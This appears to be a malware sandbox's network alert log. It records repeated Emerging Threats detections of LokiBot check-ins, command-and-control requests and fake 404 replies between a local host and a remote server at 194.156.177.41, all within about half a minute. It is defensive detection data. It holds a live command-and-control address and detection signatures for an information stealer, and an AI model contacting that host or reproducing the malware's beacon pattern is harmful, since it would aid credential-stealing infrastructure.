                                                                                    2025-01-07T12:32:29.349357+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977294.156.177.4180TCP
                                                                                    2025-01-07T12:32:29.354116+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449772TCP
                                                                                    2025-01-07T12:32:29.504390+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977394.156.177.4180TCP
                                                                                    2025-01-07T12:32:29.504390+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977394.156.177.4180TCP
                                                                                    2025-01-07T12:32:29.504390+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977394.156.177.4180TCP
                                                                                    2025-01-07T12:32:30.221935+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977394.156.177.4180TCP
                                                                                    2025-01-07T12:32:30.221935+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977394.156.177.4180TCP
                                                                                    2025-01-07T12:32:30.226727+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449773TCP
                                                                                    2025-01-07T12:32:30.382420+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977494.156.177.4180TCP
                                                                                    2025-01-07T12:32:30.382420+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977494.156.177.4180TCP
                                                                                    2025-01-07T12:32:30.382420+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977494.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.091089+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977494.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.091089+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977494.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.100067+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449774TCP
                                                                                    2025-01-07T12:32:31.256603+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977594.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.256603+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977594.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.256603+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977594.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.988683+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977594.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.988683+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977594.156.177.4180TCP
                                                                                    2025-01-07T12:32:31.994435+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449775TCP
                                                                                    2025-01-07T12:32:32.155614+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977694.156.177.4180TCP
                                                                                    2025-01-07T12:32:32.155614+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977694.156.177.4180TCP
                                                                                    2025-01-07T12:32:32.155614+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977694.156.177.4180TCP
                                                                                    2025-01-07T12:32:32.891493+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977694.156.177.4180TCP
                                                                                    2025-01-07T12:32:32.891493+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977694.156.177.4180TCP
                                                                                    2025-01-07T12:32:32.896298+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449776TCP
                                                                                    2025-01-07T12:32:33.032901+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977794.156.177.4180TCP
                                                                                    2025-01-07T12:32:33.032901+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977794.156.177.4180TCP
                                                                                    2025-01-07T12:32:33.032901+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977794.156.177.4180TCP
                                                                                    2025-01-07T12:32:33.772124+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977794.156.177.4180TCP
                                                                                    2025-01-07T12:32:33.772124+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977794.156.177.4180TCP
                                                                                    2025-01-07T12:32:33.776885+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449777TCP
                                                                                    2025-01-07T12:32:33.924411+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977894.156.177.4180TCP
                                                                                    2025-01-07T12:32:33.924411+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977894.156.177.4180TCP
                                                                                    2025-01-07T12:32:33.924411+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977894.156.177.4180TCP
                                                                                    2025-01-07T12:32:34.665544+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977894.156.177.4180TCP
                                                                                    2025-01-07T12:32:34.665544+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977894.156.177.4180TCP
                                                                                    2025-01-07T12:32:34.670302+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449778TCP
                                                                                    2025-01-07T12:32:34.814297+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977994.156.177.4180TCP
                                                                                    2025-01-07T12:32:34.814297+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977994.156.177.4180TCP
                                                                                    2025-01-07T12:32:34.814297+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977994.156.177.4180TCP
                                                                                    2025-01-07T12:32:35.557501+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977994.156.177.4180TCP
                                                                                    2025-01-07T12:32:35.557501+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977994.156.177.4180TCP
                                                                                    2025-01-07T12:32:35.562339+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449779TCP
                                                                                    2025-01-07T12:32:35.704114+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978094.156.177.4180TCP
                                                                                    2025-01-07T12:32:35.704114+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978094.156.177.4180TCP
                                                                                    2025-01-07T12:32:35.704114+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978094.156.177.4180TCP
                                                                                    2025-01-07T12:32:36.434903+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978094.156.177.4180TCP
                                                                                    2025-01-07T12:32:36.434903+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978094.156.177.4180TCP
                                                                                    2025-01-07T12:32:36.439728+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449780TCP
                                                                                    2025-01-07T12:32:36.588546+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978194.156.177.4180TCP
                                                                                    2025-01-07T12:32:36.588546+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978194.156.177.4180TCP
                                                                                    2025-01-07T12:32:36.588546+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978194.156.177.4180TCP
                                                                                    2025-01-07T12:32:37.324672+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978194.156.177.4180TCP
                                                                                    2025-01-07T12:32:37.324672+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978194.156.177.4180TCP
                                                                                    2025-01-07T12:32:37.329468+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449781TCP
                                                                                    2025-01-07T12:32:37.473584+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978294.156.177.4180TCP
                                                                                    2025-01-07T12:32:37.473584+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978294.156.177.4180TCP
                                                                                    2025-01-07T12:32:37.473584+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978294.156.177.4180TCP
                                                                                    2025-01-07T12:32:38.192729+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978294.156.177.4180TCP
                                                                                    2025-01-07T12:32:38.192729+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978294.156.177.4180TCP
                                                                                    2025-01-07T12:32:38.197506+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449782TCP
                                                                                    2025-01-07T12:32:38.360546+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978394.156.177.4180TCP
                                                                                    2025-01-07T12:32:38.360546+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978394.156.177.4180TCP
                                                                                    2025-01-07T12:32:38.360546+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978394.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.104383+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978394.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.104383+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978394.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.109271+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449783TCP
                                                                                    2025-01-07T12:32:39.253004+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978494.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.253004+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978494.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.253004+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978494.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.957327+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978494.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.957327+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978494.156.177.4180TCP
                                                                                    2025-01-07T12:32:39.962119+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449784TCP
                                                                                    2025-01-07T12:32:40.116039+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978594.156.177.4180TCP
                                                                                    2025-01-07T12:32:40.116039+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978594.156.177.4180TCP
                                                                                    2025-01-07T12:32:40.116039+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978594.156.177.4180TCP
                                                                                    2025-01-07T12:32:40.840674+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978594.156.177.4180TCP
                                                                                    2025-01-07T12:32:40.840674+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978594.156.177.4180TCP
                                                                                    2025-01-07T12:32:40.845506+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449785TCP
                                                                                    2025-01-07T12:32:40.987508+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978694.156.177.4180TCP
                                                                                    2025-01-07T12:32:40.987508+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978694.156.177.4180TCP
                                                                                    2025-01-07T12:32:40.987508+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978694.156.177.4180TCP
                                                                                    2025-01-07T12:32:41.705575+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978694.156.177.4180TCP
                                                                                    2025-01-07T12:32:41.705575+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978694.156.177.4180TCP
                                                                                    2025-01-07T12:32:41.710383+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449786TCP
                                                                                    2025-01-07T12:32:41.861754+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978794.156.177.4180TCP
                                                                                    2025-01-07T12:32:41.861754+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978794.156.177.4180TCP
                                                                                    2025-01-07T12:32:41.861754+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978794.156.177.4180TCP
                                                                                    2025-01-07T12:32:42.591000+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978794.156.177.4180TCP
                                                                                    2025-01-07T12:32:42.591000+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978794.156.177.4180TCP
                                                                                    2025-01-07T12:32:42.595767+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449787TCP
                                                                                    2025-01-07T12:32:42.736881+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978894.156.177.4180TCP
                                                                                    2025-01-07T12:32:42.736881+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978894.156.177.4180TCP
                                                                                    2025-01-07T12:32:42.736881+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978894.156.177.4180TCP
                                                                                    2025-01-07T12:32:43.480919+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978894.156.177.4180TCP
                                                                                    2025-01-07T12:32:43.480919+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978894.156.177.4180TCP
                                                                                    2025-01-07T12:32:43.485712+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449788TCP
                                                                                    2025-01-07T12:32:43.630025+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978994.156.177.4180TCP
                                                                                    2025-01-07T12:32:43.630025+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978994.156.177.4180TCP
                                                                                    2025-01-07T12:32:43.630025+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978994.156.177.4180TCP
                                                                                    2025-01-07T12:32:44.368376+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978994.156.177.4180TCP
                                                                                    2025-01-07T12:32:44.368376+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978994.156.177.4180TCP
                                                                                    2025-01-07T12:32:44.373199+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449789TCP
                                                                                    2025-01-07T12:32:44.529692+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979094.156.177.4180TCP
                                                                                    2025-01-07T12:32:44.529692+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979094.156.177.4180TCP
                                                                                    2025-01-07T12:32:44.529692+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979094.156.177.4180TCP
                                                                                    2025-01-07T12:32:45.260532+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979094.156.177.4180TCP
                                                                                    2025-01-07T12:32:45.260532+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979094.156.177.4180TCP
                                                                                    2025-01-07T12:32:45.265357+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449790TCP
                                                                                    2025-01-07T12:32:45.411818+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979194.156.177.4180TCP
                                                                                    2025-01-07T12:32:45.411818+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979194.156.177.4180TCP
                                                                                    2025-01-07T12:32:45.411818+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979194.156.177.4180TCP
                                                                                    2025-01-07T12:32:46.120173+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979194.156.177.4180TCP
                                                                                    2025-01-07T12:32:46.120173+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979194.156.177.4180TCP
                                                                                    2025-01-07T12:32:46.125040+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449791TCP
                                                                                    2025-01-07T12:32:46.293457+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979294.156.177.4180TCP
                                                                                    2025-01-07T12:32:46.293457+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979294.156.177.4180TCP
                                                                                    2025-01-07T12:32:46.293457+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979294.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.026386+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979294.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.026386+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979294.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.031149+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449792TCP
                                                                                    2025-01-07T12:32:47.179130+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979394.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.179130+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979394.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.179130+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979394.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.914990+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979394.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.914990+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979394.156.177.4180TCP
                                                                                    2025-01-07T12:32:47.919801+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449793TCP
                                                                                    2025-01-07T12:32:48.074620+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979494.156.177.4180TCP
                                                                                    2025-01-07T12:32:48.074620+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979494.156.177.4180TCP
                                                                                    2025-01-07T12:32:48.074620+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979494.156.177.4180TCP
                                                                                    2025-01-07T12:32:48.821374+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979494.156.177.4180TCP
                                                                                    2025-01-07T12:32:48.821374+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979494.156.177.4180TCP
                                                                                    2025-01-07T12:32:48.826184+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449794TCP
                                                                                    2025-01-07T12:32:48.984690+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979594.156.177.4180TCP
                                                                                    2025-01-07T12:32:48.984690+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979594.156.177.4180TCP
                                                                                    2025-01-07T12:32:48.984690+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979594.156.177.4180TCP
                                                                                    2025-01-07T12:32:49.713193+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979594.156.177.4180TCP
                                                                                    2025-01-07T12:32:49.713193+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979594.156.177.4180TCP
                                                                                    2025-01-07T12:32:49.717963+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449795TCP
                                                                                    2025-01-07T12:32:49.862472+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979694.156.177.4180TCP
                                                                                    2025-01-07T12:32:49.862472+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979694.156.177.4180TCP
                                                                                    2025-01-07T12:32:49.862472+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979694.156.177.4180TCP
                                                                                    2025-01-07T12:32:50.609302+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979694.156.177.4180TCP
                                                                                    2025-01-07T12:32:50.609302+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979694.156.177.4180TCP
                                                                                    2025-01-07T12:32:50.614088+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449796TCP
                                                                                    2025-01-07T12:32:50.758629+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979894.156.177.4180TCP
                                                                                    2025-01-07T12:32:50.758629+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979894.156.177.4180TCP
                                                                                    2025-01-07T12:32:50.758629+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979894.156.177.4180TCP
                                                                                    2025-01-07T12:32:51.495138+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979894.156.177.4180TCP
                                                                                    2025-01-07T12:32:51.495138+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979894.156.177.4180TCP
                                                                                    2025-01-07T12:32:51.499943+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449798TCP
                                                                                    2025-01-07T12:32:51.655150+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979994.156.177.4180TCP
                                                                                    2025-01-07T12:32:51.655150+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979994.156.177.4180TCP
                                                                                    2025-01-07T12:32:51.655150+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979994.156.177.4180TCP
                                                                                    2025-01-07T12:32:52.422354+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979994.156.177.4180TCP
                                                                                    2025-01-07T12:32:52.422354+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979994.156.177.4180TCP
                                                                                    2025-01-07T12:32:52.427147+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449799TCP
                                                                                    2025-01-07T12:32:52.567085+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980094.156.177.4180TCP
                                                                                    2025-01-07T12:32:52.567085+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980094.156.177.4180TCP
                                                                                    2025-01-07T12:32:52.567085+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980094.156.177.4180TCP
                                                                                    2025-01-07T12:32:53.323679+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980094.156.177.4180TCP
                                                                                    2025-01-07T12:32:53.323679+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980094.156.177.4180TCP
                                                                                    2025-01-07T12:32:53.328635+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449800TCP
                                                                                    2025-01-07T12:32:53.479625+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980194.156.177.4180TCP
                                                                                    2025-01-07T12:32:53.479625+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980194.156.177.4180TCP
                                                                                    2025-01-07T12:32:53.479625+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980194.156.177.4180TCP
                                                                                    2025-01-07T12:32:54.426552+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980194.156.177.4180TCP
                                                                                    2025-01-07T12:32:54.426552+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980194.156.177.4180TCP
                                                                                    2025-01-07T12:32:54.431309+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449801TCP
                                                                                    2025-01-07T12:32:54.584481+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980394.156.177.4180TCP
                                                                                    2025-01-07T12:32:54.584481+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980394.156.177.4180TCP
                                                                                    2025-01-07T12:32:54.584481+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980394.156.177.4180TCP
                                                                                    2025-01-07T12:32:55.294818+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980394.156.177.4180TCP
                                                                                    2025-01-07T12:32:55.294818+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980394.156.177.4180TCP
                                                                                    2025-01-07T12:32:55.301802+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449803TCP
                                                                                    2025-01-07T12:32:55.446641+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980494.156.177.4180TCP
                                                                                    2025-01-07T12:32:55.446641+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980494.156.177.4180TCP
                                                                                    2025-01-07T12:32:55.446641+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980494.156.177.4180TCP
                                                                                    2025-01-07T12:32:56.184948+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980494.156.177.4180TCP
                                                                                    2025-01-07T12:32:56.184948+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980494.156.177.4180TCP
                                                                                    2025-01-07T12:32:56.189746+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449804TCP
                                                                                    2025-01-07T12:32:56.333834+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981094.156.177.4180TCP
                                                                                    2025-01-07T12:32:56.333834+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981094.156.177.4180TCP
                                                                                    2025-01-07T12:32:56.333834+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981094.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.071831+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981094.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.071831+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981094.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.078314+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449810TCP
                                                                                    2025-01-07T12:32:57.237309+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981694.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.237309+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981694.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.237309+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981694.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.962291+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981694.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.962291+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981694.156.177.4180TCP
                                                                                    2025-01-07T12:32:57.967104+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449816TCP
                                                                                    2025-01-07T12:32:58.121179+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982294.156.177.4180TCP
                                                                                    2025-01-07T12:32:58.121179+01002025381ET MALWARE LokiBot Checkin1192.168.2.44982294.156.177.4180TCP
                                                                                    2025-01-07T12:32:58.121179+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982294.156.177.4180TCP
                                                                                    2025-01-07T12:32:58.853828+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982294.156.177.4180TCP
                                                                                    2025-01-07T12:32:58.853828+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982294.156.177.4180TCP
                                                                                    2025-01-07T12:32:58.858821+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449822TCP
                                                                                    2025-01-07T12:32:59.003527+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982894.156.177.4180TCP
                                                                                    2025-01-07T12:32:59.003527+01002025381ET MALWARE LokiBot Checkin1192.168.2.44982894.156.177.4180TCP
                                                                                    2025-01-07T12:32:59.003527+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982894.156.177.4180TCP
                                                                                    2025-01-07T12:32:59.720354+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982894.156.177.4180TCP
                                                                                    2025-01-07T12:32:59.720354+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982894.156.177.4180TCP
                                                                                    2025-01-07T12:32:59.725632+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449828TCP
                                                                                    2025-01-07T12:32:59.878899+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983794.156.177.4180TCP
                                                                                    2025-01-07T12:32:59.878899+01002025381ET MALWARE LokiBot Checkin1192.168.2.44983794.156.177.4180TCP
                                                                                    2025-01-07T12:32:59.878899+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983794.156.177.4180TCP
                                                                                    2025-01-07T12:33:00.607397+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983794.156.177.4180TCP
                                                                                    2025-01-07T12:33:00.607397+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983794.156.177.4180TCP
                                                                                    2025-01-07T12:33:00.612312+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449837TCP
                                                                                    2025-01-07T12:33:00.752916+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984394.156.177.4180TCP
                                                                                    2025-01-07T12:33:00.752916+01002025381ET MALWARE LokiBot Checkin1192.168.2.44984394.156.177.4180TCP
                                                                                    2025-01-07T12:33:00.752916+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984394.156.177.4180TCP
                                                                                    2025-01-07T12:33:01.490314+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984394.156.177.4180TCP
                                                                                    2025-01-07T12:33:01.490314+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984394.156.177.4180TCP
